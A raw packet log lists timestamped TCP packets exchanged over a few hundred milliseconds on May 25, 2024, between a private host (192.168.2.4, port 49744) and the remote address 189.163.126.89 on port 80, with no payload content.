May 25, 2024 21:29:35.423110008 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.423165083 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.424113989 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.424124956 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.424170971 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.424663067 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.424674034 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.424751043 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.425712109 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.425721884 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.425770998 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.426846027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.426856041 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.426914930 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.431735992 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.432152033 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.432429075 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.432550907 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.433073997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.433084011 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.433269024 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.434037924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.434048891 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.434098959 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.435085058 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.435096979 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.435106039 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.435148954 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.435148954 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.436101913 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.436113119 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.436163902 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.436896086 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.436906099 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.436953068 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.437942982 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.437954903 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.437963963 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.438005924 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.446933031 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.447133064 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.447227955 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.447237968 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.447247982 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.447258949 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.447300911 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.447340012 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.449645996 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.449661016 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.449666023 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.449728012 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.449903965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.449915886 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.449978113 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.450681925 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.450737953 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.456990957 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.467691898 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.468002081 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.468035936 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.473143101 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.473166943 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.473337889 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.630008936 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.630444050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.630727053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.630749941 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.631310940 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.631320953 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.631576061 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.631978035 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.631994963 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.632169962 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.634025097 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.634037018 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.634046078 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.634090900 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.634130001 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.634591103 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.635118008 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.635175943 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.635724068 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.635736942 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.635782003 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.638506889 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.638659000 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.638851881 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.639159918 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.639666080 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.639678955 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.639838934 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.640753031 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.640765905 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.640777111 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.640818119 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.640856028 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.641748905 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.641762018 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.641817093 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.642724991 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.643208027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.643218994 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.643265009 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.644954920 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.645023108 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.645226955 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.645723104 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.645777941 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.646236897 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.646749973 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.646760941 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.646811008 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.647733927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.647749901 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.647790909 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.648251057 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.648262978 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.648315907 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.649620056 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.649677992 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.649792910 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.649805069 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.649852991 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.651802063 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.652076006 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.652132988 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.652826071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.652837038 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.652997971 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.653048038 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.653063059 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.653122902 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.654020071 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.654032946 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.654083967 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.654966116 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.655819893 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.655831099 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.655880928 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.655911922 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.655967951 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.656420946 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.656431913 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.656478882 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.657138109 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.657394886 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.657449961 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.657906055 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.657917976 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.657963991 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.658397913 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.658410072 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.658457994 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.659372091 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.659384012 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.659395933 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.659435034 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.660347939 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.660360098 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.660412073 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.661245108 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.661303043 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.661979914 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.661989927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.662044048 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.662936926 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.663156033 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.663209915 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.663548946 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.663561106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.663610935 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.664347887 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.664360046 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.664412022 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.665169001 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.665179968 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.665225983 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.665849924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.665862083 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.665870905 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.665910006 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.666970015 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.667030096 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.667304039 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.667530060 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.667584896 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.667850018 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.668224096 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.668235064 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.668243885 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.668282032 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.668313026 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.668932915 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.670712948 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.670722961 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.670732975 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.670773029 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.670805931 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.670855999 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671122074 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671295881 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.671430111 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671442032 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671493053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.671824932 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671837091 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.671886921 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.672171116 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.672595024 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.672605991 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.672652960 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.673296928 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.673355103 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.673631907 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.673644066 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.673697948 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.674366951 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.674379110 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.674388885 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.674427986 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.675019026 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675076008 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.675357103 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675662994 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675673962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675683022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675693035 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675703049 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.675723076 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.675756931 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.676659107 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.676670074 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.676680088 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.676718950 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.677573919 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.677586079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.677634954 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.678212881 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.678225040 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.678234100 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.678273916 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.678307056 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.679115057 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.716959000 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.717283964 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.717448950 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.717463970 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.717473030 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.717482090 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.717837095 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.718375921 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.718688965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.718698978 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.718983889 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.722279072 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.722361088 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.740024090 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740086079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740279913 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.740417004 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740430117 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740446091 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740459919 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.740633011 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.740633011 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.741130114 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741410971 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741422892 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741462946 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.741679907 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741691113 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741700888 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.741739988 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.741771936 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.745727062 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.745738983 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.745796919 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.750865936 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.751481056 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.751661062 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.751724958 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.751885891 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752048016 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.752139091 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752151966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752203941 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.752737999 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752748966 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752758026 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752768040 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.752800941 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.752836943 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.753460884 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.753734112 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.753745079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.753753901 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.753791094 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.753823996 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.754673958 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.754726887 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.754785061 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.754967928 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.756294012 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.756328106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.756356001 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.792872906 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.793123960 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.845910072 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846025944 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846199036 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.846329927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846708059 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846741915 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846776009 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846811056 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.846883059 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.846883059 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.847685099 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.847718954 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.847752094 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.847860098 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.847860098 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.848673105 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.851061106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.851094007 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.851126909 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.853274107 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.853431940 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.853445053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.853672028 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.853831053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.853929043 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854223967 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854258060 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854285955 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.854290962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854343891 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.854779959 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854815006 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854846954 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854868889 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.854878902 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.854929924 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.855506897 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.858092070 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.858124971 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.858170986 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.861071110 CEST	80	49744	189.163.126.89	192.168.2.4
